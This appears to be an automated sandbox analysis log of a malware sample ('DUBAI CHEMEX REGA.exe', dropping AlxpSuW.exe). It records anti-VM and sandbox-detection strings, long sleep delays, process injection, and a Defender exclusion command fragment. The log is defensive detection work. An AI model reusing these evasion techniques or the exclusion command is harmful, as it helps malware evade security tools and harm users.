                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DUBAI CHEMEX REGA.exe PID: 6900, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AlxpSuW.exe PID: 6564, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWindow / User API: threadDelayed 982
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWindow / User API: threadDelayed 8839
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeWindow / User API: threadDelayed 1519
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeWindow / User API: threadDelayed 8335
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe TID: 6904Thread sleep time: -100190s >= -30000s
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe TID: 6932Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe TID: 1584Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe TID: 5852Thread sleep count: 982 > 30
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe TID: 5852Thread sleep count: 8839 > 30
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe TID: 1584Thread sleep count: 40 > 30
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe TID: 7008Thread sleep time: -104400s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe TID: 7012Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe TID: 2188Thread sleep time: -19369081277395017s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe TID: 4876Thread sleep count: 1519 > 30
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe TID: 4876Thread sleep count: 8335 > 30
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeThread delayed: delay time: 100190
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeThread delayed: delay time: 104400
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeThread delayed: delay time: 922337203685477
                      Source: AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                      Source: AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F90A76 LdrInitializeThunk,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeMemory written: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeMemory written: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess created: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess created: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.911039343.00000000015D0000.00000002.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.910592454.0000000001C60000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.911039343.00000000015D0000.00000002.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.910592454.0000000001C60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.911039343.00000000015D0000.00000002.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.910592454.0000000001C60000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.911039343.00000000015D0000.00000002.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.910592454.0000000001C60000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
